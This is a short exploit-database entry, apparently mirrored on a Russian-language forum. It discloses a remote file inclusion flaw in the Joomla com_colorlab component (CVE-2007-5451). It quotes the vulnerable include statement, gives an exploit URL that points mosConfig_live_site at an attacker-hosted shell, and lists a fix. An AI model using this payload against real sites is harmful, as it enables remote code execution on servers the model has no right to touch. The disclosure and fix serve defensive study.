- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4524
- Проверка EDB
-
- Пройдено
- Автор
- MEHMET INCE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-5451
- Дата публикации
- 2007-10-12
Код:
--------------------
Joomla com_colorlab Remote File Include
--------------------
Found : xoron
--------------------
Download:
http://download.joomlaportal.ch/content/view/474/
--------------------
Wrong Code:
include( "$mosConfig_live_site/components/com_color/about.html" );
--------------------
Exploit:
/administrator/components/com_color/admin.color.php?mosConfig_live_site=shell?
--------------------
How to Fix:
1-open admin.colo.php
2-write this codes before wrong codes
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
3-save and exit
--------------------
Thanx: mdx :)
--------------------
# milw0rm.com [2007-10-12]- Источник
- www.exploit-db.com
